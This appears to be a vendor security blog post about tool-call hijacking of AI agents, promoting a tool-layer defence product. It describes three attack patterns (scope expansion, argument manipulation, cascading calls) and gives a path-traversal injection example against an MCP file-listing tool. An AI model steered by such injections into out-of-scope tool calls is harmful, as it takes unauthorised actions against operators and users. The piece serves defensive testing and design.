AI Security

Tool-Call Hijacking: Griffin AI vs Mythos

A hijacked tool call is more consequential than a hijacked response. The defence requires the tool layer to police the model, not the other way around.

Nayan Dey
Senior Security Engineer
3 min read

Tool-call hijacking is the attack variant where prompt injection or model manipulation induces the model to invoke tools the operator did not intend. Unlike prompt injection that produces a bad response, tool-call hijacking produces bad actions in the world — files deleted, emails sent, money moved. The defence requires the tool layer to enforce scope rather than trusting the model to request only authorised actions. Architectural choices matter here more than at the model layer.

What hijacking attacks look like

Three patterns:

  • Scope-expansion attempts. The model is induced to call a tool that exists but is not authorised for the current session.
  • Argument manipulation. The model calls an authorised tool but with manipulated arguments that expand the effective access.
  • Cascading tool invocation. The model is induced to make a chain of tool calls that together produce unauthorised behaviour even if each individual call is authorised.

Each needs different defence.

Where model-level defences fail

"Ask the model nicely to only call authorised tools" is the weakest defence. It depends on the model's judgment, which is exactly what the attack exploits. Mythos-class tools that rely primarily on model-level enforcement have measurable vulnerability.

How Griffin AI handles it

Three architectural layers:

Authorisation at the tool layer. Each tool has scope, and the scope is enforced by the tool handler, not by the model. When the model emits a call to a tool outside the session's scope, the tool layer refuses regardless of how the model justified the call.

Argument validation against capability manifest. Each tool's capability manifest declares what arguments are acceptable. Argument values outside the declared range are rejected at the tool layer.

Cascading-invocation rate limits. Anomalous patterns of cascading tool calls (e.g., read followed immediately by exfiltrative write) trigger rate limits and optional out-of-band confirmation.

A concrete example

An MCP server exposes a list_files(directory) tool scoped to a specific directory. An attacker's prompt injection induces the model to call list_files(directory="../../etc/").

With model-level defences: the model may or may not refuse depending on training.

With Griffin AI's tool-layer enforcement: the tool handler rejects the call because the directory argument escapes the declared scope. The attacker's attempt is logged; the audit trail shows the model attempted an out-of-scope call.

What to evaluate

Three concrete checks:

  1. Configure an MCP server with narrow scope. Induce the model to attempt a scope-escape. Verify the scope holds.
  2. Attempt argument manipulation (path traversal, SQL injection in tool arguments). Verify the arguments are validated at the tool layer.
  3. Attempt cascading tool invocation. Verify rate limits trigger.

How Safeguard Helps

Safeguard's tool-call security is built on tool-layer enforcement of scope, argument validation, and cascading-call rate limits. The defence does not depend on the model cooperating. For organisations whose AI agents have access to real production tools, this architectural choice is the difference between a safe deployment and a latent incident.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.